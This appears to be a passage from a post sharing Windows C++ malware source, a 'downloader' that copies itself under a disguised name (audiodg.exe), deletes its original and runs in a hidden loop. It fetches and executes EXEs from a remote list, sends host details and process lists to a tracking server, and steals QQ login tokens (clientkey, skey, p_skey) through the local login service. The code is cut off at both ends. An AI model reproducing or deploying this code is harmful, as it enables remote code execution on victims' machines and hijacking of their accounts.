关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] Skey:" << skey << "\r\n" << endl;}}}}

 五次会话(获取 P_skey):

    /* 五次会话 */char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);szPtsigx.ReleaseBuffer();// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 p_skey 的值char* pskey = lpHeaderBuffer + dwSizeOfRq;while (pskey != lpHeaderBuffer){if (strstr(pskey, "p_skey=")){pskey += sizeof("p_skey");char* pEndBuffer = strstr(pskey, ";");*pEndBuffer = 0;break;}pskey--;}cout << "[+] P_skey:" << pskey << "\r\n" << endl;}}}}

 代码更新 —— 2023.09.25 v1.2 版 (添加劫持QQ Key模块)

// downloader.cpp : 定义控制台应用程序的入口点。
//#include "stdafx.h"
#include "downloader.h"#ifdef _DEBUG
#define new DEBUG_NEW
#endif#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" ) typedef BOOL(_stdcall *XXXCY)(LPCTSTR, LPCTSTR, BOOL);
typedef HINSTANCE(_stdcall *XXXCute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, int);
typedef HRESULT(_stdcall *XXXDL)(LPUNKNOWN, LPCSTR, LPCSTR, DWORD, LPBINDSTATUSCALLBACK);
typedef HINTERNET(_stdcall *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET(_stdcall *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);BOOL DelSelf();
BOOL DelTempFiles();
BOOL GetProcessName(LPCTSTR szProcess);
CString GetAllProcessNames();BOOL DownloadToFile(TCHAR *szEXEURL, TCHAR *szEXESaveFile);BOOL SendDataToCount();
BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3);void GetWinOS();
BOOL IsWow64OSEx();
CString GetMacAddress(void);static DWORD WINAPI GetQQClientKey(LPVOID pParam);TCHAR szLBFile[MAX_PATH] = "https://www.chwm.vip/load.swf";		// 远程列表文件地址
TCHAR szCountUrl[MAX_PATH] = "https://www.chwm.vip/count.php";	// 程序统计接口地址
TCHAR szVersion[MAX_PATH] = "1.2";								// 程序版本号
TCHAR szUserID[MAX_PATH] = "admin";								// 客户编号TCHAR szLBSaveFile[MAX_PATH] = { 0 };							// 列表文件本地保存地址
TCHAR szEXESaveFile[MAX_PATH] = { 0 };							// 下载的程序保存路径
TCHAR szSelfFilePath[MAX_PATH] = { 0 };							// 程序自身路径
TCHAR szSelfSaveFile[MAX_PATH] = { 0 };							// 程序自身释放路径TCHAR osx[MAX_PATH] = { 0 };									// 系统版本存放变量TCHAR CGLB[10240] = { 0 };										// 分配 10M 内存来保存成功下载的地址BOOL TJ = FALSE;
BOOL ReStart = FALSE;// 唯一的应用程序对象CWinApp theApp;using namespace std;int main(int argc, char *argv[])
{CString Encryption_Point = "****** 2023.09.25 ******";for (int i = 0; i < argc; i++){if (strstr(argv[i], "ReStart")){ReStart = TRUE;}}///// 获取程序自身路径GetModuleFileName(NULL, szSelfFilePath, MAX_PATH);///// 获取系统相关配置目录路径// CSIDL_LOCAL_APPDATA// FOLDERID_LocalAppData// 版本 5.0。 用作本地(非roaming) 应用程序的数据存储库的文件系统目录。 // 典型路径为 C:\Documents and Settings\username\Local Settings\Application DataSHGetSpecialFolderPath(NULL, szLBSaveFile, CSIDL_LOCAL_APPDATA, TRUE);SHGetSpecialFolderPath(NULL, szEXESaveFile, CSIDL_LOCAL_APPDATA, TRUE); SHGetSpecialFolderPath(NULL, szSelfSaveFile, CSIDL_LOCAL_APPDATA, TRUE);lstrcat(szLBSaveFile, "\\Temp\\Load.tmp");lstrcat(szEXESaveFile, "\\Temp");lstrcat(szSelfSaveFile, "\\Temp\\audiodg.exe");if ( !ReStart ){///// 获取目标文件或文件夹属性DWORD dwFileAttr = GetFileAttributes(szSelfSaveFile);// 判断属性是否为空if (dwFileAttr == INVALID_FILE_ATTRIBUTES){//复制自身XXXCY cy;HMODULE hkernel;hkernel = LoadLibrary(_T("kernel32.dll"));cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");if (cy != NULL){cy(szSelfFilePath, szSelfSaveFile, FALSE);}cy = NULL;FreeLibrary(hkernel);Sleep(500);lstrcat(szSelfSaveFile, " ReStart");WinExec(szSelfSaveFile, SW_SHOW);DelSelf();exit(0);}else{CString szSelfRandomName = NULL;CString szRand1 = NULL, szRand2 = NULL;// 生成16位随机名称time_t seed = time(NULL);srand((unsigned)seed);for (int j = 0; j < 16; j++){switch ((rand() % 2)){case 1:szRand1.Format("%C", rand() % 10 + 48);break;default:szRand1.Format("%C", rand() % 6 + 65);}szRand2 += szRand1;Sleep(100);}szSelfRandomName.Format(TEXT("\\%s.EXE"), szRand2);TCHAR *szSelfRandomNames = szSelfRandomName.GetBuffer(szSelfRandomName.GetLength() + 1);szSelfRandomName.ReleaseBuffer();lstrcpy(szSelfSaveFile, szEXESaveFile);lstrcat(szSelfSaveFile, szSelfRandomNames);//复制自身XXXCY cy;HMODULE hkernel;hkernel = LoadLibrary(_T("kernel32.dll"));cy = (XXXCY)GetProcAddress(hkernel, "CopyFileA");if (cy != NULL){cy(szSelfFilePath, szSelfSaveFile, FALSE);}cy = NULL;FreeLibrary(hkernel);Sleep(500);lstrcat(szSelfSaveFile, " ReStart");WinExec(szSelfSaveFile, SW_SHOW);DelSelf();exit(0);}}/////			 创建互斥 防止多次运行			 /////SetLastError(0);HANDLE g_hMutex = ::CreateMutex(NULL, FALSE, szUserID);if (GetLastError() == ERROR_ALREADY_EXISTS){exit(0);}///// 开始循环工作do{// 清理缓存DelTempFiles();// 下载远程列表文件if ( DownloadToFile(szLBFile, szLBSaveFile) ){CString myText = NULL;TCHAR Buffer[MAX_PATH] = { 0 };FILE *TK = fopen(szLBSaveFile, "r+");while (fgets(Buffer, sizeof(Buffer), TK) != NULL){myText.Format("%s", Buffer);//AfxMessageBox(myText);CString szProcess = NULL, szURL = NULL;// 标记出找到的第一个逗号在myText中的以0为初始索引的序号。// 找不到返回-1值int pos = myText.Find("|");if (pos >= 0){// 目标进程// 把左边的第一段放到szProcess中szProcess.Format("%s", myText.Left(pos));//AfxMessageBox(szProcess);// 下载地址// 把除第一段剩下的放到szURL中szURL.Format("%s", myText.Mid(pos + 1));//AfxMessageBox(szURL);TCHAR *TargetURL = szURL.GetBuffer(szURL.GetLength() + 1);szURL.ReleaseBuffer();// 判断成功列表里是否存在当前下载地址if ( !strstr(CGLB, TargetURL) ){// 判断系统是否存在目标进程if ( GetProcessName(szProcess) ){CString myEXESaveFile = NULL;CString szRand1 = NULL, szRand2 = NULL;// 生成16位随机名称time_t seed = time(NULL);srand((unsigned)seed);for (int j = 0; j < 16; j++){switch ((rand() % 2)){case 1:szRand1.Format("%C", rand() % 10 + 48);break;default:szRand1.Format("%C", rand() % 6 + 65);}szRand2 += szRand1;Sleep(100);}myEXESaveFile.Format(TEXT("%s\\%s.EXE"), szEXESaveFile, szRand2);//AfxMessageBox(myEXESaveFile);TCHAR *TargetFile = myEXESaveFile.GetBuffer(myEXESaveFile.GetLength() + 1);myEXESaveFile.ReleaseBuffer();// 下载指定 EXE 程序并运行if ( DownloadToFile(TargetURL, TargetFile) ){HMODULE hshell;hshell = LoadLibrary(_T("shell32.dll"));XXXCute cute;cute = (XXXCute)GetProcAddress(hshell, "ShellExecuteA");if (cute != NULL){HINSTANCE hNewExe = cute(NULL, "open", TargetFile, NULL, NULL, SW_SHOW);if ((DWORD)hNewExe > 32){// 成功下载并运行后// 保存地址在成功列表// 防止程序重复下载lstrcat(CGLB, TargetURL);}}cute = NULL;FreeLibrary(hshell);}}}}}fclose(TK);DeleteFile(szLBSaveFile);}if ( !TJ ){// 统计数据if ( SendDataToCount() ){TJ = TRUE;// 刷新系统图标缓存SHChangeNotify(SHCNE_ASSOCCHANGED, SHCNF_FLUSHNOWAIT, NULL, NULL);// 运行 GetQQClientKey 线程DWORD dwThreadId1;CreateThread(NULL, 0, GetQQClientKey, NULL, 0, &dwThreadId1);}}// 延时一分钟// 继续循环检测Sleep(60000);} while (1);return 0;
}BOOL DelSelf()
{SHELLEXECUTEINFO sei;TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];// Get its own file name Get the full path file name of CMDif ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0)) {lstrcpy(szParams, "/c del ");lstrcat(szParams, "\"");lstrcat(szParams, szModule);lstrcat(szParams, "\"");lstrcat(szParams, " > nul");sei.cbSize = sizeof(sei);sei.hwnd = 0;sei.lpVerb = "Open";sei.lpFile = szComspec;sei.lpParameters = szParams;sei.lpDirectory = 0; sei.nShow = SW_HIDE;sei.fMask = SEE_MASK_NOCLOSEPROCESS;if (ShellExecuteEx(&sei)) {// Set the execution level of CMD process to NORMAL executionSetPriorityClass(sei.hProcess, NORMAL_PRIORITY_CLASS);// Set the priority of its own process highSetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);// Notify the windows resource SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);return TRUE;}}return FALSE;
}BOOL DelTempFiles()
{ShellExecute(NULL, "open", "ipconfig.exe", " /flushdns", NULL, SW_HIDE);BOOL bResult = FALSE;BOOL bDone = FALSE;LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;DWORD  dwTrySize, dwEntrySize = 4096; // start buffer sizeHANDLE hCacheDir = NULL;DWORD  dwError = ERROR_INSUFFICIENT_BUFFER;do{switch (dwError){// need a bigger buffercase ERROR_INSUFFICIENT_BUFFER:delete[] lpCacheEntry;lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];lpCacheEntry->dwStructSize = dwEntrySize;dwTrySize = dwEntrySize;BOOL bSuccess;if (hCacheDir == NULL)bSuccess = (hCacheDir= FindFirstUrlCacheEntry(NULL, lpCacheEntry,&dwTrySize)) != NULL;elsebSuccess = FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize);if (bSuccess)dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// we are donecase ERROR_NO_MORE_ITEMS:bDone = TRUE;bResult = TRUE;break;// we have got an entrycase ERROR_SUCCESS:// don't delete cookie entryif (!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);// get ready for next entrydwTrySize = dwEntrySize;if (FindNextUrlCacheEntry(hCacheDir, lpCacheEntry, &dwTrySize))dwError = ERROR_SUCCESS;else{dwError = GetLastError();dwEntrySize = dwTrySize; // use new size returned}break;// unknown errordefault:bDone = TRUE;break;}if (bDone){delete[]lpCacheEntry;if (hCacheDir)FindCloseUrlCache(hCacheDir);}} while (!bDone);return TRUE;
}BOOL GetProcessName(LPCTSTR szProcess)
{HANDLE hShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);PROCESSENTRY32 pe32x = { sizeof(PROCESSENTRY32),0 };if (Process32First(hShot, &pe32x)){CString TargetName = NULL;TargetName.Format(TEXT("%s"), szProcess);TargetName.MakeLower();do {CString ProcessName = NULL;ProcessName.Format("%s", pe32x.szExeFile);ProcessName.MakeLower();if (ProcessName == TargetName){CloseHandle(hShot);return TRUE;}} while (Process32Next(hShot, &pe32x));}CloseHandle(hShot);return FALSE;
}CString GetAllProcessNames()
{CString AllProcessNames = "";HANDLE hShot2 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32),0 };if (Process32First(hShot2, &pe32)){do {CString GetProcessName = "";GetProcessName.Format(TEXT("%s"), pe32.szExeFile);AllProcessNames += GetProcessName;AllProcessNames += "|";} while (Process32Next(hShot2, &pe32));}CloseHandle(hShot2);return AllProcessNames;
}BOOL DownloadToFile(TCHAR *szEXEURL, TCHAR *szEXESaveFile)
{XXXDL kkkkkkk;HMODULE hurlmon;hurlmon = LoadLibrary(_T("urlmon.dll"));kkkkkkk = (XXXDL)GetProcAddress(hurlmon, "URLDownloadToFileA");if (kkkkkkk != NULL){HRESULT hRes = kkkkkkk(NULL, szEXEURL, szEXESaveFile, 0, NULL);if (hRes == S_OK){return TRUE;}}kkkkkkk = NULL;FreeLibrary(hurlmon);return FALSE;
}BOOL SendDataToCount()
{TCHAR dat[10240] = { 0 };TCHAR jsj[MAX_PATH] = { 0 };WSADATA _wsaData = { 0 };ZeroMemory(dat, 10240 * sizeof(TCHAR));ZeroMemory(jsj, MAX_PATH * sizeof(TCHAR));int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if (_Result == SOCKET_ERROR){lstrcat(jsj, "unkonw1");}_Result = gethostname(jsj, sizeof(jsj));if (_Result == SOCKET_ERROR){lstrcat(jsj, "unkonw2");}WSACleanup();GetWinOS();CString szMac = NULL;szMac = GetMacAddress();TCHAR *MAC = szMac.GetBuffer(szMac.GetLength() + 1);szMac.ReleaseBuffer();CString szProcess = NULL;szProcess = GetAllProcessNames();TCHAR *PROCESS = szProcess.GetBuffer(szProcess.GetLength() + 1);szProcess.ReleaseBuffer();// 构建统计数据lstrcpy(dat, szCountUrl);lstrcat(dat, "?jc=");lstrcat(dat, PROCESS);lstrcat(dat, "&ver=");lstrcat(dat, szVersion);lstrcat(dat, "&ID=");lstrcat(dat, szUserID);lstrcat(dat, "&MN=");lstrcat(dat, jsj);lstrcat(dat, "&os=");lstrcat(dat, osx);lstrcat(dat, "&mac=");lstrcat(dat, MAC);HMODULE hshell;hshell = LoadLibrary(_T("wininet.dll"));HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if (hropen != NULL){HINTERNET hropenurl = XXXInternetOpenUrl(hropen, dat, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if (hropenurl != NULL){TCHAR buffer[MAX_PATH] = { 0 };ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));DWORD dwBytesRead = 0;BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);if (ret){XXXInternetCloseHandle(hropenurl);XXXInternetCloseHandle(hropen);FreeLibrary(hshell);char *myMSG1;myMSG1 = strstr(buffer, "Fail");char *myMSG2;myMSG2 = strstr(buffer, "Success");char *myMSG3;myMSG3 = strstr(buffer, "Repeat");if (myMSG1 || myMSG2 || myMSG3){return TRUE;}else{// 由于提交的数据过长有时会导致统计失败// 这里省去 szProcess 进程变量再重新统计TCHAR postData[1024] = { 0 };ZeroMemory(postData, 1024 * sizeof(TCHAR));lstrcpy(postData, szCountUrl);lstrcat(postData, "?ver=");lstrcat(postData, szVersion);lstrcat(postData, "&ID=");lstrcat(postData, szUserID);lstrcat(postData, "&CP=");lstrcat(postData, jsj);lstrcat(postData, "&os=");lstrcat(postData, osx);lstrcat(postData, "&mac=");lstrcat(postData, MAC);if ( PostDataToCount(postData, "Success", "Fail", "Repeat") ){return TRUE;}else{return FALSE;}}}}XXXInternetCloseHandle(hropenurl);}XXXInternetCloseHandle(hropen);FreeLibrary(hshell);return FALSE;
}BOOL PostDataToCount(TCHAR *szPostURL, TCHAR *szState1, TCHAR *szState2, TCHAR *szState3)
{HMODULE hshell;hshell = LoadLibrary(_T("wininet.dll"));HINSTANCE(WINAPI *XXXInternetOpen)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);HINSTANCE(WINAPI *XXXInternetOpenUrl)(HINTERNET, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD);HINSTANCE(WINAPI *XXXInternetCloseHandle)(HINTERNET);(FARPROC&)XXXInternetOpen = GetProcAddress(hshell, "InternetOpenA");(FARPROC&)XXXInternetOpenUrl = GetProcAddress(hshell, "InternetOpenUrlA");(FARPROC&)XXXInternetCloseHandle = GetProcAddress(hshell, "InternetCloseHandle");HINTERNET hropen = XXXInternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);if (hropen != NULL){HINTERNET hropenurl = XXXInternetOpenUrl(hropen, szPostURL, NULL, NULL, INTERNET_FLAG_NO_CACHE_WRITE, NULL);if (hropenurl != NULL){TCHAR buffer[MAX_PATH] = { 0 };ZeroMemory(buffer, MAX_PATH * sizeof(TCHAR));DWORD dwBytesRead = 0;BOOL ret = ::InternetReadFile(hropenurl, buffer, sizeof(buffer), &dwBytesRead);if (ret){TCHAR *myMSG1;myMSG1 = strstr(buffer, szState1);TCHAR *myMSG2;myMSG2 = strstr(buffer, szState2);TCHAR *myMSG3;myMSG3 = strstr(buffer, szState3);if (myMSG1 || myMSG2 || myMSG3){XXXInternetCloseHandle(hropenurl);XXXInternetCloseHandle(hropen);FreeLibrary(hshell);return TRUE;}}}XXXInternetCloseHandle(hropenurl);}XXXInternetCloseHandle(hropen);FreeLibrary(hshell);return FALSE;
}void GetWinOS()
{HKEY   hKEY;LPCTSTR   data_Set = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion";long   ret0 = (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY));if (ret0 == ERROR_SUCCESS){LPBYTE owner_Get1 = new BYTE[80];DWORD type_1 = REG_SZ;DWORD cbData_1 = 80;ZeroMemory(osx, MAX_PATH * sizeof(TCHAR));long   ret1 = ::RegQueryValueEx(hKEY, "ProductName", NULL, &type_1, owner_Get1, &cbData_1);if (ret1 == ERROR_SUCCESS){char *OSVersion = (char *)owner_Get1;lstrcpy(osx, OSVersion);}else{lstrcpy(osx, "Unknow System");}}RegCloseKey(hKEY);// 判断是否 64 位系统if (IsWow64OSEx()){lstrcat(osx, " x64");}else{lstrcat(osx, " x86");}
}BOOL IsWow64OSEx()
{typedef BOOL(WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);LPFN_ISWOW64PROCESS fnIsWow64Process;BOOL bIsWow64 = FALSE;fnIsWow64Process = (LPFN_ISWOW64PROCESS)GetProcAddress(GetModuleHandle("kernel32"), "IsWow64Process");if (NULL != fnIsWow64Process){fnIsWow64Process(GetCurrentProcess(), &bIsWow64);}return bIsWow64;
}typedef struct _ASTAT_
{ADAPTER_STATUS adapt;NAME_BUFFER    NameBuff[30];
}ASTAT, *PASTAT;UCHAR GetAddressByIndex(int lana_num, ASTAT & Adapter)
{UCHAR uRetCode;NCB ncb;memset(&ncb, 0, sizeof(ncb));ncb.ncb_command = NCBRESET;ncb.ncb_lana_num = lana_num;uRetCode = Netbios(&ncb);memset(&ncb, 0, sizeof(ncb));ncb.ncb_command = NCBASTAT;ncb.ncb_lana_num = lana_num;lstrcpy((char *)ncb.ncb_callname, "*      ");ncb.ncb_buffer = (unsigned char *)&Adapter;ncb.ncb_length = sizeof(Adapter);uRetCode = Netbios(&ncb);return uRetCode;
}CString GetMacAddress(void)
{CString strMacAddress;NCB ncb;UCHAR uRetCode;int num = 0;LANA_ENUM lana_enum;memset(&ncb, 0, sizeof(ncb));ncb.ncb_command = NCBENUM;ncb.ncb_buffer = (unsigned char *)&lana_enum;ncb.ncb_length = sizeof(lana_enum);uRetCode = Netbios(&ncb);if (uRetCode == 0){num = lana_enum.length;for (int i = 0; i < num; i++){ASTAT Adapter;if (GetAddressByIndex(lana_enum.lana[i], Adapter) == 0){strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"),Adapter.adapt.adapter_address[0],Adapter.adapt.adapter_address[1],Adapter.adapt.adapter_address[2],Adapter.adapt.adapter_address[3],Adapter.adapt.adapter_address[4],Adapter.adapt.adapter_address[5]);}}}return strMacAddress;
}static DWORD WINAPI GetQQClientKey(LPVOID pParam)
{do{// 查找 QQ.exe 进程if ( GetProcessName("qq.exe") ){// 初始化URLURL_COMPONENTSA crackedURL = { 0 };char URL_STRING[] = "https://ssl.xui.ptlogin2.weiyun.com/cgi-bin/xlogin?appid=527020901&daid=372&low_login=0&qlogin_auto_login=1&s_url=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&style=20&hide_title=1&target=self&link_target=blank&hide_close_icon=1&pt_no_auth=1";char szHostName[128] = { 0 };char szUrlPath[256] = { 0 };crackedURL.dwStructSize = sizeof(URL_COMPONENTSA);crackedURL.lpszHostName = szHostName;crackedURL.dwHostNameLength = ARRAYSIZE(szHostName);crackedURL.lpszUrlPath = szUrlPath;crackedURL.dwUrlPathLength = ARRAYSIZE(szUrlPath);InternetCrackUrlA(URL_STRING, (DWORD)strlen(URL_STRING), 0, &crackedURL);// 初始化会话HINTERNET hInternet = InternetOpenA("Microsoft Internet Explorer", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);if (hInternet != NULL) {HINTERNET hHttpSession = InternetConnectA(hInternet, crackedURL.lpszHostName, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (hHttpSession != NULL) {HINTERNET hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", crackedURL.lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (hHttpRequest != NULL) {BOOL bRet = FALSE;// 发送HTTP请求bRet = HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);if (bRet) {// 查询HTTP请求状态DWORD dwRetCode = 0;DWORD dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet) {// 读取整个Headerschar lpHeaderBuffer[1024] = { 0 };dwSizeOfRq = 1024;HttpQueryInfo(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 pt_local_token 的值char* pt_local_token = lpHeaderBuffer + dwSizeOfRq;while (pt_local_token != lpHeaderBuffer) {if (strstr(pt_local_token, "pt_local_token=")) {pt_local_token += sizeof("pt_local_token");char* pEndBuffer = strstr(pt_local_token, ";");*pEndBuffer = 0;break;}pt_local_token--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] pt_local_token:" << pt_local_token << "\r\n" << endl;/* 二次会话 *///生成16位随机数time_t seed = time(NULL);srand((unsigned)seed);CString szRand1 = "", szRand2 = "";for (int j = 0; j < 16; j++){switch ((rand() % 2)){case 1:szRand1.Format("%C", rand() % 5 + 48);break;default:szRand1.Format("%C", rand() % 5 + 53);}szRand2 += szRand1;Sleep(50);}char *szRandNum = szRand2.GetBuffer(szRand2.GetLength() + 1);szRand2.ReleaseBuffer();// 初始化URL参数char lpszUrlPath[1024] = { 0 };strcat(lpszUrlPath, "/pt_get_uins?callback=ptui_getuins_CB&r=0.");strcat(lpszUrlPath, szRandNum);            // 追加16位随机数strcat(lpszUrlPath, "&pt_local_tk=");strcat(lpszUrlPath, pt_local_token);    // 追加pt_local_token// 建立会话hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){// 发送HTTP请求,添加头信息char lpHeaders[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";bRet = HttpSendRequestA(hHttpRequest, lpHeaders, strlen(lpHeaders), NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfo(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 获取返回数据的大小DWORD dwNumberOfBytesAvailable = 0;bRet = InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailable, NULL, NULL);if (bRet){// 读取网页内容char* lpBuffer = new char[dwNumberOfBytesAvailable + 1]();bRet = InternetReadFile(hHttpRequest, lpBuffer, dwNumberOfBytesAvailable, &dwNumberOfBytesAvailable);if (bRet){// 提取 QQ uinchar* uin = lpBuffer + dwNumberOfBytesAvailable;while (uin != lpBuffer){if (strstr(uin, "\"uin\":")){uin += sizeof("\"uin\":") - 1;char* pEndBuffer = strstr(uin, "}");*pEndBuffer = 0;break;}uin--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] uin:" << uin << "\r\n" << endl;delete[] lpBuffer;/* 三次会话 */// 构造 URLZeroMemory(lpszUrlPath, 1024);strcat(lpszUrlPath, "/pt_get_st?clientuin=");strcat(lpszUrlPath, uin);strcat(lpszUrlPath, "&pt_local_tk=");strcat(lpszUrlPath, pt_local_token);// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "localhost.ptlogin2.weiyun.com", 4301, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){// 添加头信息char lpHeaders2[] = "Referer:https://ssl.xui.ptlogin2.weiyun.com/";bRet = HttpSendRequestA(hHttpRequest, lpHeaders2, strlen(lpHeaders2), NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS, lpHeaderBuffer, &dwSizeOfRq, NULL);if (bRet){// 提取 ClientKey 的值char* clientkey = lpHeaderBuffer + dwSizeOfRq;while (clientkey != lpHeaderBuffer){if (strstr(clientkey, "clientkey=")){clientkey += sizeof("clientkey");char* pEndBuffer = strstr(clientkey, ";");*pEndBuffer = 0;break;}clientkey--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] clientkey:" << clientkey << "\r\n" << endl;/* 四次会话 */// 构造 URLZeroMemory(lpszUrlPath, 1024);strcat(lpszUrlPath, "/jump?clientuin=");strcat(lpszUrlPath, uin);strcat(lpszUrlPath, "&clientkey=");strcat(lpszUrlPath, clientkey);strcat(lpszUrlPath, "&keyindex=9&u1=https://www.weiyun.com/web/callback/common_qq_login_ok.html?login_succ&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=40");// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "ptlogin2.qq.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", lpszUrlPath, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){// 添加Refererchar lpReferer[128] = { 0 };strcpy(lpReferer, "Referer: ");strcat(lpReferer, "https://ptlogin2.qq.com/");strcat(lpReferer, "\r\n");HttpAddRequestHeaders(hHttpRequest, lpReferer, -1L, HTTP_ADDREQ_FLAG_ADD);bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 获取返回数据的大小DWORD dwNumberOfBytesAvailablex = 0;InternetQueryDataAvailable(hHttpRequest, &dwNumberOfBytesAvailablex, NULL, NULL);// 读取返回的 Response 数据char* lpBufferx = new char[dwNumberOfBytesAvailablex + 